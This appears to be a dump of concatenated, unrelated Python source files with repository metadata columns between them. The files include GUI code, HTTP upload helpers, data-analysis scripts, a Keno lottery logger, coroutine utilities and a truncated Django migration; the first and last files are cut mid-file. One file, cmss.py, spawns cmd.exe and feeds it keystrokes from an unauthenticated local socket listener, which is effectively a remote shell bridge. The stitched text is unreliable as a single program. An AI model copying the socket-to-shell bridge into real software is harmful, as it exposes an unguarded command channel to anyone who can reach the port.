# add everything
Klass=_fundamentalEditorMap.get(self.itemType,None)
if not Klass:
errMsg=QTextEdit(self)
errMsg.setReadOnly(True); errMsg.setText("Sorry, editing sequences of %s's is not (yet?) implemented."%(self.itemType.__name__))
self.form.insertRow(0,'<b>Error</b>',errMsg)
return
class ItemGetter():
def __init__(self,getter,index): self.getter,self.index=getter,index
def __call__(self): return self.getter()[self.index]
class ItemSetter():
def __init__(self,getter,setter,index): self.getter,self.setter,self.index=getter,setter,index
def __call__(self,val): seq=self.getter(); seq[self.index]=val; self.setter(seq)
for i,item in enumerate(currSeq):
widget=Klass(self,ItemGetter(self.getter,i),ItemSetter(self.getter,self.setter,i))
self.form.insertRow(i,'%d. '%i,widget)
logging.debug('added item %d %s'%(i,str(widget)))
if len(currSeq)==0: self.form.insertRow(0,'<i>empty</i>',QLabel('<i>(right-click for menu)</i>'))
logging.debug('rebuilt, will refresh now')
self.refreshEvent(dontRebuild=True) # avoid infinite recursion if the length would change meanwhile
def refreshEvent(self,dontRebuild=False,forceIx=-1):
currSeq=self.getter()
if len(currSeq)!=self.form.count()/2: # the form holds two items (label+field) per row
if dontRebuild: return # length changed behind our back, just pretend nothing happened and update next time instead
self.rebuild()
currSeq=self.getter()
for i in range(len(currSeq)):
item=self.form.itemAt(i,QFormLayout.FieldRole)
logging.debug('got item #%d %s'%(i,str(item.widget())))
widget=item.widget()
if not widget.hot:
widget.refresh()
if forceIx>=0 and forceIx==i: widget.setFocus()
def refresh(self): pass # SerializableEditor API
|
gpl-2.0
| -7,651,492,641,948,851,000
| 44.41601
| 360
| 0.727223
| false
| 2.92437
| false
| false
| false
|
donaldharvey/snappy
|
snappy/utils.py
|
1
|
2623
|
import urllib2
import urllib
import os
from mimetools import choose_boundary
from mimetypes import guess_type
import stat
class Singleton(type):
def __init__(self, name, bases, dict):
super(Singleton, self).__init__(name, bases, dict)
self.instance = None
def __call__(self, *args, **kw):
if self.instance is None:
self.instance = super(Singleton, self).__call__(*args, **kw)
return self.instance
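# Usage sketch (illustrative, not part of the original module): any class that sets
# Singleton as its metaclass gets exactly one shared instance (Python 2 syntax):
#
#     class Config(object):
#         __metaclass__ = Singleton
#
#     assert Config() is Config()  # both calls return the same object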
class MultipartDataHandler(urllib2.BaseHandler):
"""
A urllib2-based multipart/form-data poster, adapted slightly from
http://odin.himinbi.org/MultipartPostHandler.py and
http://code.activestate.com/recipes/146306/.
"""
handler_order = urllib2.HTTPHandler.handler_order - 20
def http_request(self, request):
data = request.get_data()
if data is not None and not isinstance(data, str): # already-encoded string bodies pass through untouched
fields, files = [], []
for key, value in data.items():
if type(value) == file:
files.append((key, value))
else:
fields.append((key, value))
if not len(files):
# no files, so go straight ahead and encode the data
data = urllib.urlencode(fields, True)
else:
content_type, data = self._encode_multipart_formdata(fields, files)
req_content_type = request.get_header('Content-Type', '')
if 'multipart/form-data' in req_content_type:
request.set_header('Content-Type', content_type)
else:
request.add_unredirected_header('Content-Type', content_type)
request.add_data(data)
return request
https_request = http_request
def _encode_multipart_formdata(self, fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, file object) elements for data to be uploaded as files
Return (content_type, body) ready for httplib.HTTP instance
"""
boundary = choose_boundary()
CRLF = '\r\n'
L = []
for (key, value) in fields:
L.append('--' + boundary)
L.append('Content-Disposition: form-data; name="%s"' % str(key))
L.append('')
L.append(str(value))
for (key, fd) in files:
L.append('--' + boundary)
filename = os.path.basename(fd.name)
filesize = os.fstat(fd.fileno())[stat.ST_SIZE]
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (str(key), str(filename))) # use the basename computed above, not the function object
mimetype = guess_type(filename)[0] or 'application/octet-stream'
L.append('Content-Type: %s' % mimetype)
L.append('Content-Length: %s' % filesize)
L.append('')
fd.seek(0)
L.append(fd.read())
L.append('--' + boundary + '--')
L.append('')
body = CRLF.join(L)
contenttype = 'multipart/form-data; boundary=%s' % boundary
return contenttype, body
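# Wiring sketch (illustrative; the URL and field names are made up): install the
# handler into an opener so that dicts containing file objects are posted as
# multipart/form-data, while plain dicts fall back to urlencoded bodies:
#
#     opener = urllib2.build_opener(MultipartDataHandler())
#     opener.open('http://example.com/upload',
#                 {'title': 'shot', 'image': open('shot.png', 'rb')})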
|
gpl-3.0
| 9,019,982,423,787,834,000
| 32.202532
| 107
| 0.676706
| false
| 3.156438
| false
| false
| false
|
intel-hadoop/Big-Data-Benchmark-for-Big-Bench
|
engines/hive/queries/q08/q08_filter_sales_with_reviews_viewed_before.py
|
1
|
3144
|
#"INTEL CONFIDENTIAL"
#Copyright 2016 Intel Corporation All Rights Reserved.
#
#The source code contained or described herein and all documents related to the source code ("Material") are owned by Intel Corporation or its suppliers or licensors. Title to the Material remains with Intel Corporation or its suppliers and licensors. The Material contains trade secrets and proprietary and confidential information of Intel or its suppliers and licensors. The Material is protected by worldwide copyright and trade secret laws and treaty provisions. No part of the Material may be used, copied, reproduced, modified, published, uploaded, posted, transmitted, distributed, or disclosed in any way without Intel's prior express written permission.
#
#No license under any patent, copyright, trade secret or other intellectual property right is granted to or conferred upon you by disclosure or delivery of the Materials, either expressly, by implication, inducement, estoppel or otherwise. Any license under such intellectual property rights must be express and approved by Intel in writing.
import sys
import logging
import traceback
import os
import time
from time import strftime
web_page_type_filter=sys.argv[1]
seconds_before_sale_filter = long(sys.argv[2])
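# Invocation sketch (hypothetical values; hive supplies the real ones): the script runs
# as a streaming reducer over tab-separated clickstream rows, e.g.
#     ... | python q08_filter_sales_with_reviews_viewed_before.py review 259200
# i.e. count a sale when a 'review' page view happened at most 259200s (3 days) earlier.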
if __name__ == "__main__":
line = ''
try:
current_key = ''
last_review_date=-1
#sales_sk should be distinct
last_sales_sk = ''
#expects input to be partitioned by uid and sorted by date_sk (and timestamp) ascending
for line in sys.stdin:
# clustered by wcs_user_sk and sorted by wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type ascending in this order => ensured by hive
wcs_user_sk, tstamp_inSec_str, wcs_sales_sk, wp_type = line.strip().split("\t")
#reset on partition change
if current_key != wcs_user_sk :
current_key = wcs_user_sk
last_review_date = -1
last_sales_sk = ''
tstamp_inSec = long(tstamp_inSec_str)
#found review before purchase, save last review date
if wp_type == web_page_type_filter:
last_review_date = tstamp_inSec
continue
#if we encounter a sold item ( wcs_sales_sk.isdigit() => valid non null value) and a user looked at a review within 'seconds_before_sale_filter' => print found sales_sk backt to hive
#if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() : #version with duplicate sales_sk's
if last_review_date > 0 and (tstamp_inSec - last_review_date) <= seconds_before_sale_filter and wcs_sales_sk.isdigit() and last_sales_sk != wcs_sales_sk : #version reduced duplicate sales_sk's
last_sales_sk = wcs_sales_sk
print wcs_sales_sk
except:
## should only happen if input format is not correct, like 4 instead of 5 tab separated values
logging.basicConfig(level=logging.DEBUG, filename=strftime("/tmp/bigbench_q8_reducer_%Y%m%d-%H%M%S.log"))
logging.info('web_page_type_filter: ' + web_page_type_filter )
logging.info('seconds_before_sale_filter: ' + str(seconds_before_sale_filter))
logging.info("line from hive: \"" + line + "\"")
logging.exception("Oops:")
raise # re-raise after logging; the interpreter already exits with a non-zero status
|
apache-2.0
| -7,692,260,263,573,723,000
| 51.4
| 663
| 0.735687
| false
| 3.409978
| false
| false
| false
|
viswimmer1/PythonGenerator
|
data/python_files/34574373/cmss.py
|
1
|
2623
|
import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes
user32 = ctypes.windll.user32
CONQUE_WINDOWS_VK = {
'3' : win32con.VK_CANCEL,
'8' : win32con.VK_BACK,
'9' : win32con.VK_TAB,
'12' : win32con.VK_CLEAR,
'13' : win32con.VK_RETURN,
'17' : win32con.VK_CONTROL,
'20' : win32con.VK_CAPITAL,
'27' : win32con.VK_ESCAPE,
'28' : win32con.VK_CONVERT,
'35' : win32con.VK_END,
'36' : win32con.VK_HOME,
'37' : win32con.VK_LEFT,
'38' : win32con.VK_UP,
'39' : win32con.VK_RIGHT,
'40' : win32con.VK_DOWN,
'45' : win32con.VK_INSERT,
'46' : win32con.VK_DELETE,
'47' : win32con.VK_HELP
}
def make_input_key(c, control_key_state=None):
kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT)
kc.KeyDown = True
kc.RepeatCount = 1
cnum = ord(c)
if cnum == 3: # Ctrl-C: deliver a console control event instead of a key record
win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
return None
else:
kc.Char = unicode(c)
if str(cnum) in CONQUE_WINDOWS_VK:
kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)]
else:
kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum)
#kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96)
#kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED
return kc
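# Example (illustrative): an ordinary character becomes one KEY_EVENT input record,
# while Ctrl-C (chr(3)) is translated into a console control event and yields None:
#
#     rec = make_input_key('a')          # PyINPUT_RECORDType, KeyDown=True
#     assert make_input_key(chr(3)) is None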
#win32console.AttachConsole()
coord = win32console.PyCOORDType
con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW
(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
# for i in xrange(0, size.Bottom):
# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
# f.write("\n")
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
(sc, scname) = s.accept()
while True:
msg = sc.recv(1)
if ord(msg) == 0:
break
key = make_input_key(msg)
if key is not None: # Ctrl-C is handled inside make_input_key and produces no record
con_stdin.WriteConsoleInput([key])
win32process.TerminateProcess(handle1, 0)
|
gpl-2.0
| 1,044,929,001,205,104,300
| 26.846154
| 109
| 0.643157
| false
| 2.766878
| false
| false
| false
|
airanmehr/bio
|
Scripts/TimeSeriesPaper/Plot/topSNPs.py
|
1
|
1589
|
'''
Copyleft Oct 14, 2016 Arya Iranmehr, PhD Student, Bafna Lab, UC San Diego, Email: airanmehr@gmail.com
'''
import numpy as np;
np.set_printoptions(linewidth=200, precision=5, suppress=True)
import pandas as pd;
pd.options.display.max_rows = 20;
pd.options.display.expand_frame_repr = False
import seaborn as sns
import matplotlib as mpl
import os;
home = os.path.expanduser('~') + '/'
import Utils.Util as utl
import Scripts.TimeSeriesPaper.RealData.Utils as rutl
a = rutl.loadAllScores().groupby(level='h', axis=1).apply(rutl.HstatisticAll)
df = pd.read_pickle(utl.outpath + 'real/scores.df')
i = df.lrd.sort_values().index[-1]
print df.loc[i] # inspect the top-scoring site
cd = pd.read_pickle(utl.outpath + 'real/CD.F59.df')
import Utils.Plots as pplt
import pylab as plt
names = rutl.loadSNPIDs()
sns.set_style("white", {"grid.color": "0.9", 'axes.linewidth': .5, "grid.linewidth": "9.99"})
mpl.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']});
mpl.rc('text', usetex=True)
reload(pplt)
f, ax = plt.subplots(1, 2, sharey=True, dpi=300, figsize=(4, 2))
i = a[0.5].sort_values().index[-1]
sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2})
pplt.plotSiteReal(cd.loc[i], ax=ax[0], legend=True)
ax[0].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8)
i = df.lrdiff.sort_values().index[-1]
pplt.plotSiteReal(cd.loc[i], ax=ax[1])
sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2})
ax[1].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8)
plt.gcf().subplots_adjust(bottom=0.2)
pplt.savefig('topSNPs', 300)
plt.show()
|
mit
| 2,218,888,666,753,329,700
| 32.104167
| 102
| 0.680302
| false
| 2.486698
| false
| true
| false
|
edx/edx-load-tests
|
util/generate_summary.py
|
1
|
3450
|
# -*- coding: utf-8 -*-
"""
Generate a summary of a previous loadtest run in this environment.
See for usage example in a jenkins job dsl:
https://github.com/edx/jenkins-job-dsl/blob/master/testeng/jobs/loadtestDriver.groovy
Prerequisites:
A logfile produced by util/run-loadtest.sh should be present in its
standard location.
Output:
Produces summary on standard output in YAML format. The structure is as
follows:
* monitoring_links:
* list of link text/url pairs pointing to monitoring dashboards.
* timeline:
* begin: ISO 8601 date for when the test began.
* end: ISO 8601 date for when the test ended.
"""
from datetime import timedelta
import yaml
import helpers.markers
from util.app_monitors_config import MONITORS
# Refer to util/run-loadtest.sh in case this file path changes.
STANDARD_LOGFILE_PATH = "results/log.txt"
def parse_logfile_events(logfile):
"""
Parse the logfile for events
Parameters:
logfile (file): the file containing locust logs for a single load test
Returns:
iterator of (datetime.datetime, str) tuples: the parsed events in the
order they are encountered.
"""
for line in logfile:
data = helpers.markers.parse_logfile_event_marker(line)
if data is not None:
yield (data['time'], data['event'])
def get_time_bounds(logfile):
"""
Determine when the load test started and stopped.
Parameters:
logfile (file): the file containing locust logs for a single load test
Returns:
two-tuple of datetime.datetime: the time bounds of the load test
"""
relevant_events = ['locust_start_hatching', 'edx_heartbeat', 'quitting']
relevant_times = [
time
for time, event
in parse_logfile_events(logfile)
if event in relevant_events
]
begin_time, end_time = (min(relevant_times), max(relevant_times))
return (begin_time, end_time)
def main():
"""
Generate a summary of a previous load test run.
This script assumes "results/log.txt" is the logfile in question.
"""
with open(STANDARD_LOGFILE_PATH) as logfile:
loadtest_begin_time, loadtest_end_time = get_time_bounds(logfile)
monitoring_links = []
for monitor in MONITORS:
monitoring_links.append({
'url': monitor.url(
begin_time=loadtest_begin_time,
end_time=loadtest_end_time,
),
'text': u'{}: {} ({} — {})'.format(
monitor.monitoring_service_name,
monitor.app_name,
# We use naive datetimes (i.e. no attached tz) and just
# assume UTC all along. Tacking on the "Z" implies UTC.
loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
),
})
print(yaml.dump(
{
'timeline': {
'begin': loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'end': loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
},
'monitoring_links': monitoring_links
},
default_flow_style=False, # Represent objects using indented blocks
# rather than inline enclosures.
allow_unicode=True,
))
if __name__ == "__main__":
main()
|
apache-2.0
| -6,008,860,902,320,476,000
| 30.345455
| 85
| 0.606729
| false
| 3.913734
| true
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/coroutine.py
|
1
|
3783
|
from __future__ import unicode_literals
import types
from prompt_toolkit.eventloop.defaults import get_event_loop
from prompt_toolkit.eventloop.future import Future
__all__ = [
'From',
'Return',
'ensure_future',
]
def ensure_future(future_or_coroutine):
"""
Take a coroutine (generator) or a `Future` object, and make sure to return
a `Future`.
"""
if isinstance(future_or_coroutine, Future):
return future_or_coroutine
elif isinstance(future_or_coroutine, types.GeneratorType):
return _run_coroutine(future_or_coroutine)
else:
raise ValueError('Expecting coroutine or Future object. Got %r: %r' % (
type(future_or_coroutine), future_or_coroutine))
class Return(Exception):
"""
For backwards-compatibility with Python2: when "return" is not supported in
a generator/coroutine. (Like Trollius.)
Instead of ``return value``, in a coroutine do: ``raise Return(value)``.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
return 'Return(%r)' % (self.value, )
def From(obj):
"""
Used to emulate 'yield from'.
(Like Trollius does.)
"""
return ensure_future(obj)
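# Combined sketch (illustrative; `some_future` is a placeholder): a Python-2-style
# coroutine yields futures via From() and returns its result by raising Return():
#
#     def fetch_and_double(f):       # f is some Future yielding a number
#         value = yield From(f)
#         raise Return(2 * value)
#
#     result_future = ensure_future(fetch_and_double(some_future))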
def _run_coroutine(coroutine):
"""
Takes a generator that can yield Future instances.
Example:
def gen():
yield From(...)
print('...')
yield From(...)
ensure_future(gen())
The values which are yielded by the given coroutine are supposed to be
`Future` objects.
"""
assert isinstance(coroutine, types.GeneratorType)
loop = get_event_loop()
result_f = loop.create_future()
# Wrap this future in a `_FutureRef`. We need this in order to be able to
# break all its references when we're done. This is important
# because in case of an exception, we want to be sure that
# `result_f.__del__` is triggered as soon as possible, so that we see the
# exception.
# (If `step_next` had a direct reference to `result_f` and there is a
# future that references `step_next`, then sometimes it won't be cleaned up
# immediately. - I'm not sure how exactly, but in that case it requires the
# garbage collector, because refcounting isn't sufficient.)
ref = _FutureRef(result_f)
# Loop through the generator.
def step_next(f=None):
" Execute next step of the coroutine."
try:
if f is None:
new_f = coroutine.send(None)
else:
exc = f.exception()
if exc:
new_f = coroutine.throw(exc)
else:
new_f = coroutine.send(f.result())
except StopIteration:
# Stop coroutine. Make sure that a result has been set in the future,
# this will call the callbacks. (Also, don't take any result from
# StopIteration, it has already been set using `raise Return()`.
if not ref.future.done():
ref.future.set_result(None)
ref.forget()
except Return as e:
ref.future.set_result(e.value)
ref.forget()
except BaseException as e:
ref.future.set_exception(e)
ref.forget()
else:
# Process yielded value from coroutine.
assert isinstance(new_f, Future), 'got %r' % (new_f, )
@new_f.add_done_callback
def continue_(_):
step_next(new_f)
# Start processing coroutine.
step_next()
return result_f
class _FutureRef(object):
def __init__(self, future):
self.future = future
def forget(self):
" Forget reference. "
self.future = None
|
mit
| 911,875,866,142,147,300
| 29.02381
| 81
| 0.591594
| false
| 4.116431
| false
| false
| false
|
bhdouglass/remindor-common
|
tests/test_time_validation.py
|
1
|
1362
|
import remindor_common.datetimeutil as d
valid_singular = [
"now",
"1:00pm",
"1:00 pm",
"13:00",
"13",
"1300",
"1pm"
]
valid_repeating = [
"every hour",
"every hour from 1 to 1:00pm",
"every minute",
"every minute from 2:00pm to 1500",
"every 3 minutes",
"every 3 minutes from 3:30pm to 3:45 pm",
"every 2 hours",
"every 2 hours from 8 to 10"
]
invalid = [
"every minute from",
"asdf",
"every minutes to 3",
"2500",
"25",
"-1",
"every -2 minutes",
"every minute from 5 to 1",
"every minute from 5 to 5",
"8/12/13",
"October 12",
"7-21-2013"
]
print "testing valid singular times"
for row in valid_singular:
print "?" + row + "?"
value = d.str_time_simplify(row)
print "!" + str(value) + "!"
if value is None:
print "value should not be None!"
exit()
print ""
print "testing valid repeating times"
for row in valid_repeating:
print "?" + row + "?"
value = d.str_time_simplify(row)
print "!" + str(value) + "!"
if value is None:
print "value should not be None!"
exit()
print ""
print "testing invalid times"
for row in invalid:
print row
value = d.str_time_simplify(row)
print value
if value is not None:
print "value should be None!"
exit()
|
gpl-3.0
| 4,687,957,397,284,547,000
| 18.73913
| 45
| 0.550661
| false
| 3.274038
| false
| false
| false
|
jokajak/itweb
|
data/env/lib/python2.6/site-packages/repoze.what-1.0.9-py2.6.egg/repoze/what/release.py
|
1
|
1208
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008-2009, Gustavo Narea <me@gustavonarea.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the BSD-like license at
# http://www.repoze.org/LICENSE.txt. A copy of the license should accompany
# this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL
# EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND
# FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
repoze.what release information.
The version number is loaded to help the Quickstart plugin configure
repoze.what correctly, depending on the version available -- although it may
be useful on other packages.
"""
import os
_here = os.path.abspath(os.path.dirname(__file__))
_root = os.path.dirname(os.path.dirname(_here))
version = open(os.path.join(_root, 'VERSION.txt')).readline().rstrip()
# The major version: If version=='3.0.2rc4', the major version is int(3).
major_version = int(version.split('.')[0])
|
gpl-3.0
| -1,875,028,804,024,402,000
| 35.606061
| 78
| 0.639901
| false
| 3.947712
| false
| false
| false
|
picleslivre/schemaprobe
|
schemaprobe.py
|
1
|
2343
|
from __future__ import unicode_literals
import sys
import functools
import json
try:
import jsonschema
except ImportError:
jsonschema = None
try:
import requests
except ImportError:
requests = None
__version__ = '1.0.0.dev1'
__all__ = ['ensure', 'JsonProbe']
# --------------
# Py2 compat
# --------------
PY2 = sys.version_info[0] == 2
if PY2:
string_types = (str, unicode)
else:
string_types = (str,)
# --------------
class JsonProbe(object):
"""
An instance that knows how to perform validations against json-schema.
"""
_jsonschema = jsonschema
def __init__(self, schema):
"""
:param schema: json-schema as json-encoded text or python datastructures.
"""
if self._jsonschema is None:
raise TypeError('Missing dependency `jsonschema`.')
self.schema = self._normalize_input(schema)
def validate(self, input):
"""
Validate `input` agains the given schema.
:param input: json-encoded text or python datastructures.
:returns: boolean
"""
data = self._normalize_input(input)
try:
self._jsonschema.validate(data, self.schema)
except self._jsonschema.ValidationError:
return False
else:
return True
def _normalize_input(self, input):
"""
Always return python datastructures.
:param input: json-encoded text or python datastructures.
"""
if isinstance(input, string_types):
return json.loads(input)
else:
return input
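# Usage sketch (illustrative schema): both json text and python structures are
# accepted on either side:
#
#     probe = JsonProbe('{"type": "object"}')
#     probe.validate({'answer': 42})   # -> True
#     probe.validate('[1, 2, 3]')      # -> False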
def ensure(probe):
"""
Decorator that asserts the returned value is valid against `probe`.
"""
def ensure_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
result = f(*args, **kwargs)
if probe.validate(result):
return result
else:
raise TypeError('Returned data does not conform with the given schema.')
return wrapper
return ensure_decorator
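# Decorator sketch (illustrative): guard a function's return value with a probe;
# a TypeError is raised when the data drifts away from the schema:
#
#     probe = JsonProbe({'type': 'array'})
#     @ensure(probe)
#     def get_items():
#         return [1, 2, 3]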
class TestCaseMixin(object):
def assertSchemaIsValid(self, probe, resource_url, msg=None):
api_sample = requests.get(resource_url)
if not probe.validate(api_sample.json()):
raise self.failureException(msg or 'Schema is invalid.')
|
bsd-2-clause
| 1,664,159,037,023,619,000
| 23.154639
| 88
| 0.593683
| false
| 4.314917
| false
| false
| false
|
sighingnow/sighingnow.github.io
|
resource/k_nearest_neighbors/dating.py
|
1
|
3622
|
#! /usr/bin/env python
# -*- coding: utf-8
'''
Name: dating.py(KNN algorithm)
Training and test dataset: dating.txt
Created on Feb 8, 2015
@author: Tao He
'''
__author__ = 'Tao He'
from numpy import array as nmarray
from matplotlib import pyplot as plt
LABEL_MAP = {
'didntLike': 1,
'smallDoses': 2,
'largeDoses': 3,
}
ATTR_MAP = {
1: 'Number of frequent flyer miles earned per year',
2: 'Percentage of time spent playing video games',
3: 'Liters of ice cream consumed per week',
}
def create_dataset(filename=None):
''' Return data group and labels.
Get the data from file.
If the filename is not specified, return None.
dataformat: flyerMiles, gameTime, icecream, label.
'''
def normalize_data(data=None):
''' Normalized dataset.
Normalize all data to range 0-1.
'''
if data is None:
return None
for column in range(data[0].__len__()):
max_val, min_val = max(data[:, column]), min(data[:, column])
for row in range(data.__len__()):
data[row][column] = (data[row][column]-min_val)/(max_val-min_val)
return data
if filename == None:
return (None, None)
group = []
labels = []
with open(filename, mode='r') as fp_data:
for line in fp_data:
group.append([float(num) for num in line[:-1].split('\t')[0:3]])
labels.append(LABEL_MAP[line[:-1].split('\t')[3]])
return normalize_data(nmarray(group)), labels
def draw_pic(group=None, labels=None, x=0, y=0):
''' Draw a subplot from data group.
'''
if group is None or labels is None:
return None
name = 'knn-dating'
figure = plt.figure(num=name, dpi=100)
ax_main = figure.add_subplot(1, 1, 1, xlabel=ATTR_MAP[x+1], ylabel=ATTR_MAP[y+1], title=name)
ax_main.scatter(group[:, x], group[:, y],
s=15*nmarray(labels),
c=[[i/float(LABEL_MAP.__len__())] for i in labels]) # float division so each label maps to a distinct shade
plt.show()
## plt.savefig('%s.png'%name, format='png', dpi=100)
def knn_classify(group, labels, attrs, ratio=0.5, item=0, k=3):
''' Return the type of item.
knn classify function.
'''
def get_dist(i, j):
''' Return the distance between group[i] and group[j].
'''
dist = 0.0
for attr in attrs:
dist += (group[i][attr]-group[j][attr])*(group[i][attr]-group[j][attr])
return dist
length = group.__len__()
distence = []
for i in range(int(length*ratio), length):
distence.append((i, get_dist(item, i)))
cnt = {}
distence.sort(key=lambda item: item[1])
for i in range(k):
label = labels[distence[i][0]]
if label in cnt:
cnt[label] += 1
else:
cnt[label] = 1
return sorted(cnt.items(), key=lambda item: item[1], reverse=True)[0][0]
def knn():
''' KNN classify algorithm.
'''
data, labels = create_dataset('dating.txt')
ratio, attr = 0.5, [0, 1, 2]
cnt, cnt_correct = 0, 0
length = data.__len__()
for i in range(0, int(length*ratio)):
cnt += 1
knn_type = knn_classify(data, labels, attr, ratio, i, 3)
# print('case[%d]: real: %d, knn: %d'%(i, labels[i], knn_type))
if knn_type == labels[i]:
cnt_correct += 1
print('total: %d, correct: %d, correct ratio: %f'%(cnt, cnt_correct, cnt_correct/float(cnt))) # float division, also correct under Python 2
if __name__ == '__main__':
knn()
# vim: set sw=4, ts=4, fileencoding=utf-8
|
mit
| 8,461,827,833,393,829,000
| 27.933884
| 97
| 0.543622
| false
| 3.301732
| false
| false
| false
|
AYJAYY/KenoDB
|
keno.py
|
1
|
4245
|
# Keno Data Logging - QuickKeno
# KDL v1.5.2 - Python 3 Conversion
# Last Edit Date: 1/9/2021
from urllib.request import urlopen
import json
import time
def write_file(file_name, write_mode, file_text):
text_file = open(file_name, write_mode)
text_file.write(file_text)
text_file.close()
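# Example (illustrative path): append one CSV row to a file, creating it if needed:
#     write_file('KenoFiles/example.csv', 'a+', '1,2,3\n')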
#get the keno json file
ma_keno_json = urlopen("http://www.masslottery.com/data/json/search/dailygames/todays/15.json")
#read from the json file
json_string = ma_keno_json.read()
#parse the json file so we can work with it
parsed_json = json.loads(json_string)
#get the min and max game and subtract them...
#...so we can get total number of games to iterate over
min_game = int(parsed_json['min'])
max_game = int(parsed_json['max'])
games = max_game - min_game
#script loop
while games > 0:
#get info from "draws" section in json file + create error log
orgOrder = parsed_json['draws'][games]['winning_num_org']
sortedOrder = parsed_json['draws'][games]['winning_num']
multiplier = parsed_json['draws'][games]['bonus']
multi_int = parsed_json['draws'][games]['bonus_value']
draw = parsed_json['draws'][games]['draw_id']
#split on dashes 19 times to split up the 20 numbers
orgOrder_split = orgOrder.split('-', 19)
#join the 20 numbers with commas to accomodate the csv
orgOrder_join = ",".join(orgOrder_split)
orgOrder_column = "\n".join(orgOrder_split)
#a way to string together the data using my "write file" function, this
#also turns everything into a string format so I can concatenate them.
long_text = str(orgOrder_join + "," + orgOrder + "," + sortedOrder + "," + multiplier + "," + multi_int + "," + draw) + "\n"
#also put the numbers in a single row for alternate file
single_row = str(orgOrder_column + "\n")
#write out to the files individually
try:
#format today's date for the filename and set it
date = time.strftime("%Y-%m-%d")
kenodbfile = "KenoFiles/Daily/kenodb" + str(date) + ".csv"
#write a new daily file
write_file(kenodbfile, "a+", long_text)
#append to the master file
write_file("KenoFiles/kenodbfull.csv", "a+", long_text)
#append to the single column file
write_file("KenoFiles/kenodbfull-1column.csv", "a+", single_row)
#in case the user is running on demand, give success messages & log them
print("Succesfully logged game #" + draw)
vlog_string = "<font size='1px'><strong>Succesfully logged game:</strong> " + draw + " <strong>|</strong> </font>" + "\n"
sys_log = "KenoFiles/SYSLOG.html"
write_file(sys_log,"a+",vlog_string)
except Exception as eW:
error_date_eW = time.strftime("%Y-%m-%d-%I:%M %p")
error_text_eW = str(eW) + " | " + "File Write Error" + " | " + error_date_eW + "<br />" + "\n"
sys_log = "KenoFiles/SYSLOG.html"
log_html = "KenoFiles/LOG.html"
html_text = """<button type="button" class="btn btn-danger">An error has occured while writing to one of the files. Check the log in /KenoFiles</button><br \>""" + "\n"
write_file(sys_log,"a+",error_text_eW)
write_file(log_html,"a+",html_text)
print("An error has occured while writing to one of the files. Check the logs in /KenoFiles")
break
games = games - 1
#success - write to logs and print out in case this is an on demand run
games = max_game - min_game
success_date = time.strftime("%Y-%m-%d-%I:%M %p")
log_html = "KenoFiles/LOG.html"
sys_log = "KenoFiles/SYSLOG.html"
success_html = "<center><div class='bg-success' style='border:1px solid green;'><strong><font color='green'> KenoDB completed successfully" + " | " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Total Games: " + str(games) + "</font></strong></div></center><br \>" + "\n"
sys_success_html = """<button type="button" class="btn btn-success">KenoDB completed successfully""" + " | Date: " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Number Of Games: " + str(games) + "</button><br \>" + "\n"
write_file(log_html,"a+",sys_success_html)
write_file(sys_log,"a+",success_html)
print("KenoDB completed successfully")
|
gpl-3.0
| 8,259,616,565,052,512,000
| 47.793103
| 313
| 0.643816
| false
| 3.151448
| false
| false
| false
|
nephila/djangocms-blog
|
djangocms_blog/liveblog/migrations/0001_initial.py
|
1
|
2058
|
import django.db.models.deletion
import filer.fields.image
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("cms", "0013_urlconfrevision"),
("filer", "0003_thumbnailoption"),
]
operations = [
migrations.CreateModel(
name="Liveblog",
fields=[
(
"cmsplugin_ptr",
models.OneToOneField(
parent_link=True,
auto_created=True,
primary_key=True,
serialize=False,
to="cms.CMSPlugin",
